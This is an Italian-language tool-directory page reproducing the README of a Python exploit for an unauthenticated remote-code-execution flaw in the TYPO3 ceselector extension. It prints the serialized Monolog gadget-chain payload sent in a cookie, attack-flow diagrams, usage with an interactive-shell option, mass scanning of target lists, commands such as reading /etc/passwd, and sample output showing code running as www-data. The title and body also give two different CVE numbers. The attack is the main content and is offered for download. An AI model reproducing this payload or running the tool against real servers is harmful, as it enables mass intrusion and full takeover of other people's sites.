Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-46275 — Exploit Python per CVE-2026-46725, che permette l'esecuzione remota di codice non autenticata nell'estensione TYPO3 ceselector tramite iniezione di oggetti PHP e catena di gadget Monolog. | Kitploit
Strumenti/GitHubGitHub/xxconi/cve-2026-46275
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubxxconi/cve-2026-46275

CVE-2026-46275

Exploit Python per CVE-2026-46725, che permette l'esecuzione remota di codice non autenticata nell'estensione TYPO3 ceselector tramite iniezione di oggetti PHP e catena di gadget Monolog.

Vedi Repository
2 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-46725 — Estensione TYPO3 ceselector RCE

Iniezione di oggetti PHP tramite unserialize() bypass di cookie → Esecuzione di codice remoto

CVSS CWE Auth Python License


📋 Indice

  • Informazioni sulla vulnerabilità
  • Dettagli tecnici
  • Requisiti
  • Installazione
  • Utilizzo
  • Esempi
  • Formato dell'output
  • Come funziona
  • Riferimenti
  • Avviso legale

🔍 Informazioni sulla vulnerabilità

Descrizione

L'estensione TYPO3 ceselector passa il valore del cookie denominato T3_ceselector_* direttamente alla funzione unserialize() senza alcuna validazione. Un aggressore può inserire un payload appositamente preparato di Iniezione di oggetti PHP in questo cookie ed eseguire comandi arbitrari sul server.

⚠️ Prerequisito: Affinché la vulnerabilità possa essere sfruttata, è necessario che nell'impostazione TYPO3 sia attiva la modalità Persistent Mode: Static.


🔧 Dettagli tecnici

Flusso dell'attacco

root@kitploit:~
1. GET /  →  Il server restituisce Set-Cookie: T3_ceselector_<id>=<value>
2. GET /  →  Cookie: T3_ceselector_<id>=<PAYLOAD>
             └─ Viene attivato PHP unserialize()
             └─ Viene eseguita la catena di gadget Monolog
             └─ L'output di system("id") viene riflesso nella risposta

Catena di gadget

root@kitploit:~
Monolog\Handler\GroupHandler
  └─ Monolog\Handler\BufferHandler
       └─ Monolog\LogRecord (buffer)
            └─ processors: [get_object_vars, end, system]
                 └─ system("<CMD>")  ← RCE

Struttura del payload

root@kitploit:~
O:28:"Monolog\Handler\GroupHandler":1:{
  s:11:"*handlers";a:1:{
    i:0;O:29:"Monolog\Handler\BufferHandler":6:{
      s:10:"*handler";r:3;
      s:13:"*bufferSize";i:1;
      s:14:"*bufferLimit";i:0;
      s:9:"*buffer";a:1:{
        i:0;O:17:"Monolog\LogRecord":2:{
          s:5:"level";E:19:"Monolog\Level:Debug";
          s:5:"mixed";s:2:"id";   ← Comando OS qui
        }
      }
      s:14:"*initialized";b:1;
      s:13:"*processors";a:3:{
        i:0;s:15:"get_object_vars";
        i:1;s:3:"end";
        i:2;s:6:"system";   ← sink
      }
    }
  }
}

📦 Requisiti

  • Python 3.8+
  • Libreria requests
root@kitploit:~
Python >= 3.8
requests >= 2.28.0

⚙️ Installazione

root@kitploit:~
# Clona il repository
git clone https://github.com/example/CVE-2026-46725
cd CVE-2026-46725

# Installa le dipendenze
pip install requests

# Oppure con requirements.txt
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0

🚀 Utilizzo

root@kitploit:~
usage: CVE-2026-46725 [-h] (-u URL | -l FILE) [-c CMD] [-i]
                      [-t N] [--timeout S] [--proxy URL]
                      [-o FILE] [-v] [--no-color]

options:
Bersaglio:
  -u, --url URL       URL del singolo bersaglio
  -l, --list FILE     Elenco dei bersagli (un URL per riga)

Exploit:
  -c, --cmd CMD       Comando OS da eseguire (predefinito: id)
  -i, --interactive   Apri una shell interattiva dopo exploit riuscito

Scansione:
  -t, --threads N     Numero di thread (predefinito: 10)
  --timeout S         Timeout in secondi (predefinito: 15)
  --proxy URL         Proxy (es: http://127.0.0.1:8080)

Output:
  -o, --output FILE   File dei risultati
  -v, --verbose       Output dettagliato
  --no-color          Output senza colori

📌 Esempi

Singolo bersaglio — Utilizzo base

root@kitploit:~
python CVE-2026-46725.py -u https://typo3-site.com

Esecuzione di comando personalizzato

root@kitploit:~
python CVE-2026-46725.py -u https://typo3-site.com -c "whoami"
python CVE-2026-46725.py -u https://typo3-site.com -c "cat /etc/passwd"
python CVE-2026-46725.py -u https://typo3-site.com -c "uname -a"

Shell interattiva

root@kitploit:~
python CVE-2026-46725.py -u https://typo3-site.com --interactive
root@kitploit:~
typo3@ceselector $ id
│ uid=33(www-data) gid=33(www-data) groups=33(www-data)
typo3@ceselector $ uname -a
│ Linux web01 5.15.0-91-generic #101-Ubuntu SMP x86_64 GNU/Linux
typo3@ceselector $ pwd
│ /var/www/html
typo3@ceselector $ exit

Scansione di massa

root@kitploit:~
# Scansiona con 20 thread, salva i risultati
python CVE-2026-46725.py -l targets.txt -t 20 -o results.txt

# 30 thread, comando personalizzato
python CVE-2026-46725.py -l targets.txt -t 30 -c "id"

Con proxy (Burp Suite)

root@kitploit:~
python CVE-2026-46725.py -u https://typo3-site.com \
  --proxy http://127.0.0.1:8080 -v

Formato targets.txt

root@kitploit:~
https://site1.com
https://site2.com
http://site3.com
site4.com

📊 Formato dell'output

Output del terminale

root@kitploit:~
① Rilevamento TYPO3 & ceselector
────────────────────────────────────────────────────
· TYPO3             ✓ Rilevato
· ceselector        ✓ Attivo
· Nome cookie        T3_ceselector_48291
· Versione TYPO3     12.4.3

② Preparazione payload
────────────────────────────────────────────────────
· Tecnica            Iniezione di oggetti PHP → Catena gadget Monolog
· Gadget             Monolog\Handler\GroupHandler
· Sink               system()
· Comando            id

④ Output RCE
────────────────────────────────────────────────────
┌─ OUTPUT RCE ────────────────────────────────────
│ uid=33(www-data) gid=33(www-data) groups=33(www-data)
└─────────────────────────────────────────────────

File di registro (results.txt)

root@kitploit:~
============================================================
CVE-2026-46725 — TYPO3 ceselector RCE
Data: 2026-05-26 17:30:00
============================================================

[+] BERSAGLI CON RCE OTTENUTA (2)
----------------------------------------
URL        : https://typo3-site.com
Versione   : 12.4.3
Cookie     : T3_ceselector_48291
Comando    : id
Output     : uid=33(www-data) gid=33(www-data) groups=33(www-data)

🔬 Come funziona

root@kitploit:~
┌─────────────────────────────────────────────────────────┐
│                    FLUSSO DELL'EXPLOIT                   │
├─────────────────────────────────────────────────────────┤
│                                                         │
│  1. RILEVAMENTO                                         │
│     GET /  ──────────────────────► Server TYPO3        │
│             ◄──── Set-Cookie: T3_ceselector_XXXXX ───── │
│                                                         │
│  2. PREPARAZIONE PAYLOAD                                │
│     build_payload("id")                                 │
│     └─ Catena gadget Monolog codificata URL             │
│                                                         │
│  3. EXPLOIT                                             │
│     GET /                                               │
│     Cookie: T3_ceselector_XXXXX=O:28:"Monolog...        │
│             ──────────────────────► unserialize()       │
│                                    └─ __destruct()      │
│                                    └─ system("id")      │
│             ◄──── uid=33(www-data) gid=33(www-data) ─── │
│                                                         │
│  4. VERIFICA                                            │
│     regex: uid=\d+\([a-z_][a-z0-9_-]*\)\s+gid=...      │
│                                                         │
└─────────────────────────────────────────────────────────┘

📚 Riferimenti

  • Avviso di sicurezza TYPO3 TYPO3-EXT-SA-2026-001
  • Packagist — mmc/ceselector
  • CWE-502: Deserializzazione di dati non attendibili
  • Calcolatore CVSS 3.1

⚖️ Avviso legale

Questo strumento è sviluppato esclusivamente per scopi educativi e test di sicurezza autorizzati.

  • Utilizzalo solo sui tuoi sistemi o su sistemi per i quali hai esplicita autorizzazione scritta.
  • L'uso contro sistemi non autorizzati è illegale e può comportare conseguenze legali.
  • Lo sviluppatore non può essere ritenuto responsabile per l'uso improprio di questo strumento.

CVE-2026-46725 | TYPO3 ceselector RCE | Exploit Python

Scarica lo strumento
CampoDettaglio
ID CVECVE-2026-46725
ProdottoEstensione TYPO3 ceselector (mmc/ceselector)
Versione interessata<= 1.1.3
Tipo di vulnerabilitàDeserializzazione non sicura (Iniezione di oggetti PHP)
Punteggio CVSS9.8 Critico
Vettore CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-502 (Deserializzazione di dati non attendibili)
Punteggio EPSS0,0046 (percentile %64,3)
AutenticazioneNon richiesta (non autenticata)
ImpattoRCE completo — Controllo totale del sistema
RicercatoreDhiyaneshDk